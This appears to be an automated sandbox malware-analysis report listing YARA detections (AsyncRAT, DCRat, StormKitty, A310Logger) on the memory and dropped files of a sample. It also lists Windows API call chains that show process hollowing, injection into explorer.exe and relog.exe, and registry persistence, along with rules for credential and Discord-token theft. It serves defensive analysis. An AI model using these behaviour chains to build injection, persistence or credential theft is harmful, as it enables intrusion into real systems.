Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: 53A5.tmp.update.exe PID: 7508, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, type: DROPPED	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: Detects A310Logger Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: Detects A310Logger Author: ditekSHen

.NET source code contains very large strings

Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.cs	Long String: Length: 12792
Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.cs	Long String: Length: 29668
Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.cs	Long String: Length: 12332
Source: accc.exe.5.dr, CwkOLYwEiqNy.cs	Long String: Length: 12792
Source: accc.exe.5.dr, CwkOLYwEiqNy.cs	Long String: Length: 29668
Source: accc.exe.5.dr, CwkOLYwEiqNy.cs	Long String: Length: 12332

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1832A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,	0_2_00007FF68A1832A8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A183574 NtCreateSection,NtClose,	0_2_00007FF68A183574
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A183614 wcsnlen,GetModuleHandleA,GetProcAddress,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,	0_2_00007FF68A183614
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1883E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,	0_2_00007FF68A1883E8
Source: C:\Windows\explorer.exe	Code function: 2_2_08CBC55C CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,	2_2_08CBC55C
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Code function: 19_2_00007FFD9B5F31C5 NtProtectVirtualMemory,	19_2_00007FFD9B5F31C5
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3383E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,	47_2_00007FF6AA3383E8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3332A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,	47_2_00007FF6AA3332A8
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA333574 NtCreateSection,NtClose,	47_2_00007FF6AA333574
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA333614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,	47_2_00007FF6AA333614
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B032A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,	52_2_00007FF7C9B032A8
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B03614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,	52_2_00007FF7C9B03614
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B03574 NtCreateSection,NtClose,	52_2_00007FF7C9B03574
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B083E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,	52_2_00007FF7C9B083E8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE483574 NtCreateSection,NtClose,	53_2_00007FF7AE483574
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE483614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,	53_2_00007FF7AE483614
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4883E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,	53_2_00007FF7AE4883E8
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4832A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,	53_2_00007FF7AE4832A8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C32A8 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,OpenProcess,GetCurrentProcess,DuplicateHandle,	55_2_00007FF7C07C32A8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C83E8 RtlAdjustPrivilege,NtSetInformationProcess,RtlAdjustPrivilege,NtSetInformationProcess,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,Sleep,	55_2_00007FF7C07C83E8
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C3614 wcsnlen,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,ResumeThread,	55_2_00007FF7C07C3614
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C3574 NtCreateSection,NtClose,	55_2_00007FF7C07C3574

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1832A8	0_2_00007FF68A1832A8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1878F0	0_2_00007FF68A1878F0
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A182DBC	0_2_00007FF68A182DBC
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A199358	0_2_00007FF68A199358
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A192430	0_2_00007FF68A192430
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A14D8	0_2_00007FF68A1A14D8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A18FCE8	0_2_00007FF68A18FCE8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A198D34	0_2_00007FF68A198D34
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1909EC	0_2_00007FF68A1909EC
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1829C8	0_2_00007FF68A1829C8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A185AC0	0_2_00007FF68A185AC0
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A0B24	0_2_00007FF68A1A0B24
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A42F8	0_2_00007FF68A1A42F8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A0774	0_2_00007FF68A1A0774
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A2FD8	0_2_00007FF68A1A2FD8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A193FC8	0_2_00007FF68A193FC8
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1A382C	0_2_00007FF68A1A382C
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A188878	0_2_00007FF68A188878
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1820C0	0_2_00007FF68A1820C0
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A19F100	0_2_00007FF68A19F100
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A194618	0_2_00007FF68A194618
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1926C8	0_2_00007FF68A1926C8
Source: C:\Windows\explorer.exe	Code function: 2_2_08B9AD08	2_2_08B9AD08
Source: C:\Windows\explorer.exe	Code function: 2_2_08B9184C	2_2_08B9184C
Source: C:\Windows\explorer.exe	Code function: 2_2_08B931F0	2_2_08B931F0
Source: C:\Windows\explorer.exe	Code function: 2_2_08B97EE4	2_2_08B97EE4
Source: C:\Windows\explorer.exe	Code function: 2_2_08B90A7C	2_2_08B90A7C
Source: C:\Windows\explorer.exe	Code function: 2_2_08CB167C	2_2_08CB167C
Source: C:\Windows\explorer.exe	Code function: 2_2_08CB244C	2_2_08CB244C
Source: C:\Windows\explorer.exe	Code function: 2_2_08CB3DF0	2_2_08CB3DF0
Source: C:\Windows\explorer.exe	Code function: 2_2_08CBB908	2_2_08CBB908
Source: C:\Windows\explorer.exe	Code function: 2_2_08CB8AE4	2_2_08CB8AE4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3696E0	2_2_0C3696E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C370C28	2_2_0C370C28
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37A410	2_2_0C37A410
Source: C:\Windows\explorer.exe	Code function: 2_2_0C368478	2_2_0C368478
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37AC64	2_2_0C37AC64
Source: C:\Windows\explorer.exe	Code function: 2_2_0C373CF4	2_2_0C373CF4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C378DB8	2_2_0C378DB8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36E5C0	2_2_0C36E5C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C368ED8	2_2_0C368ED8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36DEC4	2_2_0C36DEC4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37BFF0	2_2_0C37BFF0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C370FD8	2_2_0C370FD8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3690D4	2_2_0C3690D4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C353920	2_2_0C353920
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37C979	2_2_0C37C979
Source: C:\Windows\explorer.exe	Code function: 2_2_0C378940	2_2_0C378940
Source: C:\Windows\explorer.exe	Code function: 2_2_0C354200	2_2_0C354200
Source: C:\Windows\explorer.exe	Code function: 2_2_0C373A5C	2_2_0C373A5C
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37831C	2_2_0C37831C
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3C4520	2_2_0F3C4520
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E8F1C	2_2_0F3E8F1C
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3C4E00	2_2_0F3C4E00
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E465C	2_2_0F3E465C
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3ED579	2_2_0F3ED579
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E9540	2_2_0F3E9540
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3D9CD4	2_2_0F3D9CD4
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3ECBF0	2_2_0F3ECBF0
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E1BD8	2_2_0F3E1BD8
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3DA2E0	2_2_0F3DA2E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3D9AD8	2_2_0F3D9AD8
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3DEAC4	2_2_0F3DEAC4
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E99B8	2_2_0F3E99B8
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3DF1C0	2_2_0F3DF1C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E1828	2_2_0F3E1828
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3EB010	2_2_0F3EB010
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3D9078	2_2_0F3D9078
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3EB864	2_2_0F3EB864
Source: C:\Windows\explorer.exe	Code function: 2_2_0F3E48F4	2_2_0F3E48F4
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Code function: 5_2_00007FFD9B5F0D35	5_2_00007FFD9B5F0D35
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Code function: 5_2_00007FFD9B5F3131	5_2_00007FFD9B5F3131
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_00866390	6_2_00866390
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_00865AC0	6_2_00865AC0
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_00869758	6_2_00869758
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_00869760	6_2_00869760
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_00865778	6_2_00865778
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_051105FF	6_2_051105FF
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_05110600	6_2_05110600
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_0511C108	6_2_0511C108
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_0511C0F7	6_2_0511C0F7
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_05115D52	6_2_05115D52
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_05115D60	6_2_05115D60
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_00C66390	9_2_00C66390
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_00C65AC0	9_2_00C65AC0
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_00C69750	9_2_00C69750
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_00C69760	9_2_00C69760
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_00C65778	9_2_00C65778
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057A05F0	9_2_057A05F0
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057A0600	9_2_057A0600
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057AC108	9_2_057AC108
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057AC0F7	9_2_057AC0F7
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057A5D60	9_2_057A5D60
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057A5D52	9_2_057A5D52
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0113D6B0	10_2_0113D6B0
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01133C98	10_2_01133C98
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01136FD3	10_2_01136FD3
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01137073	10_2_01137073
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011370A2	10_2_011370A2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0113F3C9	10_2_0113F3C9
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011387D7	10_2_011387D7
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011387D8	10_2_011387D8
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0113D6AF	10_2_0113D6AF
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011319D0	10_2_011319D0
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011319C0	10_2_011319C0
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01133C89	10_2_01133C89
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0113EF7F	10_2_0113EF7F
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05550988	10_2_05550988
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0555C258	10_2_0555C258
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0555C248	10_2_0555C248
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05550979	10_2_05550979
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05555630	10_2_05555630
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05555620	10_2_05555620
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0555FB58	10_2_0555FB58
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0570CEA9	10_2_0570CEA9
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_057041D8	10_2_057041D8
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_057029BB	10_2_057029BB
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05700040	10_2_05700040
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05704BC2	10_2_05704BC2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0570C207	10_2_0570C207
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0570F208	10_2_0570F208
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05705C60	10_2_05705C60
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05706198	10_2_05706198
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05700039	10_2_05700039
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0570E028	10_2_0570E028
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0570E018	10_2_0570E018
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05706BC0	10_2_05706BC0
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05706BB2	10_2_05706BB2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05712C10	10_2_05712C10
